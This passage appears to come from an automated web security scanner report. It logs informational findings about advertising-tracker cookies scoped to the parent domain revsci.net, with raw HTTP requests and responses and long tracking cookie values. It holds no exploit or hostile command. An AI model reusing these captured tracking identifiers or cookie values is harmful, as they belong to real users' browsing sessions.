rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:56 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

11.33. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I07714/b3/0/3/1008211/304415100.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that most of the Set-Cookie headers in this response carry an empty value and an epoch Expires date; those clear existing rtc_* cookies rather than issue new ones, and only the two non-empty cookies at the end are actually set.

Request

GET /I07714/b3/0/3/1008211/304415100.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F04%252Fus-weather-football-idUSTRE78222D20110904%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="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"; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spZQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yNA1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ymBV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UZSm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jxkC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_U-2H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MHAh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mC_w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hJ1L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a0q5=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CGuf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vcWj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UeD7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NZMh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gtXn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Gz72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I_s8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4Yae=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_13QU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yd99=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kx93=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vjxv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i6y7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ci3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BIfh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hlh0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fVrw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UYkU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vq52=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p_N7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_swop=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DAhz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_36jJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EGaf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yqe4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Xkff=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PotF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6iIy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rG0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bmc9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AIz7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_owhI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YG_I=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ttgh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qIL0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zoqu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wj7v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8_Kd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HV6c=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lX7E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cMvP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PMyZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qp5L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LM_E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qsf6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vgZJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vs0v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5KhS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__-hU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e4dU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tBSl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1hrT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cAs9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ufy6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zbl-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kzjM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4dwc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_7nfY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TXTA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ifOy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uXx-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SZmK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VzFl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MYGJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ePg8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2b4r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BSfF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xPU8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MM9p=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KwBW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NX3a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QdlW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HkOY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8S1T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jqXq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bM22=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cSyo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__g8N=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vWFu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sm2o=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aHEk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_trlL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_S6yp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_46IH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fPgs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vtS4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Q7Ad=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uQON=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1YTe=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRRI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iCxA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wveS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IoVb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XSck=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOMnC7gMMU594t/Sn7ey31RI0YjFJAbeHbXhIfrk4Ow++ZH8gIQtYr8iWg2RZvh/nqSuFNyBKWw8Xyc7c/RIna/1WF9Q8p6WStaYJPam7yG21EA//kgEQ6MuyzqUKz7IUGE71nqp5Au9VMkKc/okTNLTXO89O6DKukkzJFi3MA0P6larBAMm1+anARqSwCEH+pmFjv+pITclEQ9S5f07ns5ipgm0hyliLId0YqoxKyXj/KVYnPmJ3S57oyns/3A==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
Set-Cookie: rtc_wRZH=MLsvsKMucD5nJRGm+X48W1s+JnWw2pAhBM0cosZtfJ9ViXcJRkBPy031UQhZHBj2vSo7My1zYrWwcschx0t7TSkF8tieuR/3XAVwFM0lt/amf/M8PVJdtTynoppWQLwUyw+nQ4vnPoZ4ecjmuzsYWm/I2N73KKVfeX8CHvaFRB/odeHTVhMokPrgK0qQ+4F3yU2W660bYz6wEhP5v4RYC/mf52PIfQqOyndNLJkQCFD+6kkfncm9CKn0SA3XJsqyB7uYxqUSa1VKB2R0mTF1Ysy+cH5CU7aekURYILu4a+PbQ0i+M6NDTvAB/ZnFaR0vRSvwLSTwhp/efqpVeBpt7fymb4N5xV/bBbuIdvrIVZNthFUL8XeqVq3HZxhXhVSm+7A7svJUS5WwVMRvjIc4MEZPO4teely4a6ukWwMIWcaNZJCu8pdF3Xk+rpnQ6GfVFyq9jR0AvAhLLm6Ma1/MjwM=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:56:55 GMT
Content-Length: 730

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

11.34. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; 
rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
